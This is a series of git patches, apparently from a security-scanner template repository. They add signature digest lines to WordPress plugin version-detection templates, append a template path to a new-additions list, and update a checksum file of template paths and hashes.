'(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e6b3455b9a4067bac9e177492e003d96a76efe26c257360bb7c0e58a9fe24ad60220387aeddc681702fc5928821a4c6ebe648d755490be49af59fae2a6702895d0d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..d99d72e3b7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f2385cd16916bd9272cdaa3110d0d9924790b97ecd7fbc82eb3e243ad64f7450220684f58ceac840ff56a87fd34907d4df7b14c3e6c865ec41a74268eea14d488cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..f8b12a99a1 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e53b6bf3d1a47c96dbcacf1600910e815978dacba61cb162c36de87b9be3b80d022064deea85fae7d961718b7aa7a74f6208fdd4eb1a4465afbf1a5b850159866284:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..27661e088e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fd7ecf3ce26da302c91d4753eee96f597b4014c5f2bf8015f42d0537e3815d01022100a063674b8c59a511ea08057a0b6eca9c77ef73f781d931e99898fdee3df172eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..c4348a5c99 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206b0d61d63a56586e6efa862c03cc72df0a4c282dd47c2596a9db1a416fdc7a3402203b811de7eab61537ed67ede0c8adecafdbfe52ceffbe5fcb7dfe09e1ae09388e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..a93beeecea 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040711480084a93ba22eb1541db54de58a0972570b7150695d258f294ca05c55902210084fa094a0e92fb6f2da40f10015478c9c1adc36562d3dfcbc55f44ef6cb234e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..b16859adb0 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220312ad6709cddcbf96208dc1e5b534d3972eee20b78045c2cecdd493fd3c4cf770221009c1b7af188df7f0c7431d02d8ab32fc9f1667a8e295b51e86376589ac171d7f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..6d14910d5e 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097c53d10d1c8bec404c9ba48eda64528432d61703c9e1b8dee4621ca8e0e7e26022069ba4262f9924757d8881ab03af7e6c3148968c9f6666ba3765ce573ec31a754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..bbc5beffa4 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022050cd3ff6bae166fe13287482302834e9aebaa90ce864fefc950644e6b37205f2022100fb4e889a5cb3349894dd5e0be8d3eb6f25cb1f6377c7a9b97cc5ba5e4d37b5b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..3a5b468aec 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220640f01ffe2f57fa6404d9841632e5052d3658f4d344bccb8a7d83ede8f285319022100e128f6a42eb9f602478f28fc40b0493c60ec522d05ebd3349e1ba5eeecfb0413:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..0ca9c2dc82 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204884b4363520d673abd8639b6785dc1f6610405a9692c1f31320948c4bbf87b2022051e5ee53a2d9294649756b8698c1c959b18631df17811778523799fca3c15810:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index bece4ce486..e812464596 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100da74bbd37026d5cd063bd2d87c78c3a629a04ba4a33f7b7ade0f0fcefa3da5400221009cf140458d03ec33fe8923a350fe00ce48073fb144cbac680c21b9694eb01ffa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index 138b0aa9a6..33a39b64b3 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201fd43dbc93360a51cc2a564d9ecd71ab3758c21dc4a478c22ad8f6cedcd5c114022100ad802f0d4d9e753554590909f1804df1a3a566a7b39b670c164ea65db9aa87a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 68bf71bc83..5314ea40df 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203ebdc3d8b7d35808d2444a5285d56c860763f57714b3c3fe4c91bd0f3259ea74022100a4857731f7e6c83914ebecde533e4b9b5f749eac7254d1560ebc229d06e03d49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 10dad2d2fb..0c0969c565 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ea68c91c8830eb8dbaf647993731d68b932c0609f8795182c56cf277bdea0de5022100f71936fa98b175c5b374d77a75ed1c685635b90b96ea237f327c556deea64192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index e9efe6fb53..5a4cd5564f 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f85aa1d32ce9f0ba00add38a888bd198c4558b23dec6e0a51f988daf477d9243022100f0120f47540596c487de15c2e35e7679f3408664a016461a761446f929e1c9f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index c3d10f0135..5cbb7d535a 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cad53f3b3e6bfec34e3444cb3af249ae68728edc4328ff4cf14f8cbf75a15440022100bbb815bd4cba8077aeca58f4a4f67ae691816eb22d0744f261c774c415d23fb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..16752dccf4 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068c0de38750dcdb94e771ec1770d6688de688c80fd559528d3d9230c29db8d250221009df9528d539b814dce0a82227738e0dbc33b213df5ef0237bc0ae4231205e435:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..94e42f526c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c2a2eb5025231d4b690840b146fb34b60ffa55b5b86f8b439702057805ed3670220649f409630965c3c379d3fc03c7f7ce0046ecaeaa4514d3775abb9f977b88b96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..db0c84ea04 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071166a051005f218f2cd445d3261588472d2c99a7b3a42ef3a7fcd19c507738202205215b0035c6610ea908c54da825fb41ab4afdbfb4dbb38b21afbd124abc78195:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..a46072bcdd 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c662b200972c4730bac3abe62c83116ecf270217c1b521b4ac4f1b15083c22e4022100c630fb06096715824cb19c28a65aa5699a486b2965a02507afb43001ba3d1d3a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..141cbe93d0 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220439e8bd3d1b6bd98414a3714fcc4bd5d732b8135c803ea7ec34be98fc1de4956022100d647bd858801603516b9aeebc66c3fb07666203f4ffb8b33da236e3a50403b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..12d2b56eff 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f7b82f7e6a9c6f24b940f2bfaf91dcc514f9aaa62ef8025a3166d6e49190fb002200f8a3ec15305abfbd4b358faef563de58eac9394619fcf560d644861006032b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..d467105e1f 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b0470b762199b905e27020511d55d5b1eb83627583361773cc53cb7951f18b4022100b0e02d1bd6fe83a34a46d18034d8d5cf5bf83eaef62747227002c73fadb4c45c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..6eda5f66db 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d78ec5393297257820ed021a2b2c32567175d0ac9687fc72fd3deb581cc590a60221008786a22ee6a36f2c62518a446106e25d5e3a08e578e3b9e1304ad7a9dafe3e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..30b0c571a6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021560ac33b4b82f917023d10fdde395e8d65cacc138880cadf6f929bb499c934022100f68e31a9703453a74ca957d3c88c32f9402644e825d60930b33d08bcb20b9227:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..dc648e15bc 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200bdc171bb7d9ff7065e3ecdb8f06c1f222cebb6a4d8e878edccf8a8c6a58eb6b022100c40817ea26c76623c77f50e5d47eaef40250204aa87bcab3d2a9b98420671e66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..e1d0b579fd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046393a7093b0a14ef2743dcd94e62d176af17b29de6c8026645e80cf5f4a7789022100e6d7f7cf4a8fb597f3593290f3dd9b8dc11bd112ad90becc19e9298e498d2898:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..629439acb5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c0d431f8885f905dafbf76fe1444299af5d615d2eabdbd7f983e52006be33b5102206c047f984f838490f42a21dc1fd88b6d33127fb4a2770bd156e3ac409d669930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaaf0f9a17..f033252e94 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aeb3774ea370a73fe2b7a162d13df7f73b25d6fa761ca76f6b853df55e2d0ac502200a0c16c4d7c13e0039e10cc80eb20bbce9a0a96a01009874872292b68cd6f289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..e9eddc4c39 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206bb300e7116c50b114c0aacb6a086647b173da0e019fa4cb56ca389815dffe6c022100c6f9d68dfea1b208b03edbecb6a1865805a73ad8c9eeb89c93759868e65cd04a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..ea0789c4e4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ae898303673464ba3816949325821948ee752f688bc15e47125e3fd69d644e900221008c68527f1380a636e9e53af1c512e22d70dac37cd0dbb4b181419acdc72ac4c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..ad7b5c96ec 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbb2faa62f33338d616af5c603039cb86bf08aea526d628db1903726d4b452d502203322910323a5b860c8bdb03539037f08f03d1f628e2437b195b6a207bed704a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 945fe23fcdc9c6a339104f5a5871f17bc58e0686 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:46:35 +0000 Subject: [PATCH 1224/1841] Auto Generated New Template Addition List [Mon Jul 15 04:46:35 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index be9a06be7b..ee9a11893a 100644 --- a/.new-additions +++ b/.new-additions @@ -7,5 +7,6 @@ http/cves/2024/CVE-2024-4879.yaml http/cves/2024/CVE-2024-5217.yaml http/exposed-panels/gradle/gradle-develocity-panel.yaml http/exposures/configs/snoop-servlet-exposure.yaml +http/misconfiguration/servicenow-title-injection.yaml http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml From 40a045389bd29d71cd1d00a62ab2386413ff154b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:46:41 +0000 Subject: [PATCH 1225/1841] Auto Generated Templates Checksum [Mon Jul 15 04:46:41 UTC 2024] :robot: --- templates-checksum.txt | 410 +++++++++++++++++++++-------------------- 1 file changed, 206 insertions(+), 204 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index abe35b6839..6888ca621e 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -223,8 +223,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:195a062188e964c090fb5e569831f7956db9829a -cves.json-checksum.txt:543480fd5d685fb2dd4d1ca242c6dfa4e5ffa6b1 +cves.json:54289a82cf1c037dd6448d8f9eeb1bf730e677c6 +cves.json-checksum.txt:d5f06463ea1caf086fbccbaca48d49d83876faf8 dast/cves/2018/CVE-2018-19518.yaml:3407e99af553fe5bdb0ffc001a4132e169c55730 dast/cves/2021/CVE-2021-45046.yaml:a52633e88957969fb09969be45c0a8606ee3d752 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -3492,9 +3492,10 @@ http/cves/2024/CVE-2024-4434.yaml:832631bb51317578dff7d1f78cc15a33ffe9c00a http/cves/2024/CVE-2024-4443.yaml:bd877d88a3381249f47f17961c167cb8ae3bfaa9 http/cves/2024/CVE-2024-4577.yaml:c53e4d3f699e49597036f2b9e5ea8ab75e67904b http/cves/2024/CVE-2024-4836.yaml:2dd1cd40b76fc713b718db4852eb9bca8cf67380 -http/cves/2024/CVE-2024-4879.yaml:ff11adf8264ac17f5c4b5e238d32016c92492b75 +http/cves/2024/CVE-2024-4879.yaml:d7145baebf2f66d94413b3508aef384bfe691b3f http/cves/2024/CVE-2024-4956.yaml:c6be2d64ff4b985c30acc88c57c66d57a846d25a http/cves/2024/CVE-2024-5084.yaml:8ede90fad7058c4a2a7499562f98cacae32ede68 +http/cves/2024/CVE-2024-5217.yaml:fb8c78c0785c6975ce0706b89ff8e911d9e022e6 http/cves/2024/CVE-2024-5230.yaml:8b073f5f6aa9e22b66403c2c6297fb487fbade0c http/cves/2024/CVE-2024-5522.yaml:1aae46b20c03316823691aa8755eb8e35b46533a http/cves/2024/CVE-2024-5947.yaml:1007c228fb459bf995a9b759b10c668e190ab1e6 @@ -5916,6 +5917,7 @@ http/misconfiguration/sentinel-license-monitor.yaml:123e83ea787470cc96323f371c0f http/misconfiguration/seq-dashboard-unath.yaml:c8f87c43bbc194440decf9a5a58444279b11fb5d http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202 http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9 +http/misconfiguration/servicenow-title-injection.yaml:8cdd5a1a8081cc7a66789662570f9a1f533d49da http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0 http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d @@ -7280,228 +7282,228 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:ec6d6a80835bbb3f4141c9af043faa54caa09d90 +http/technologies/wordpress/plugins/add-to-any.yaml:45e1ec080492018feecfa2c9995d9f4f46a7e196 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:2a710053db37c53c93a1b7c2712ec6fbf9e5dc9d http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:49a18104c3daf80a90c52b4919c7e512e81d0d9c +http/technologies/wordpress/plugins/akismet.yaml:1a755eae638b38bf09e11a20d46e44db70bd0456 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:cf549a4946cd28525b458e7d22fd60380e0c63cb +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:2a418957205cd8e1ac557a830e88689ae5ded1e6 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:d0a62ac8b1184cd285a851d188813aa801eed1f4 +http/technologies/wordpress/plugins/amp.yaml:70d51ff352fbe5bd009823857d20c84cd1077539 +http/technologies/wordpress/plugins/antispam-bee.yaml:e3dd8e3cabe81656fa177144104dbda698fa1bdf +http/technologies/wordpress/plugins/astra-sites.yaml:7e6ad639b876a664219d0b6c21179d9819cd9cd7 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:18ec876d0e4b0404ca5650d6ba87cf9bf30faf3f 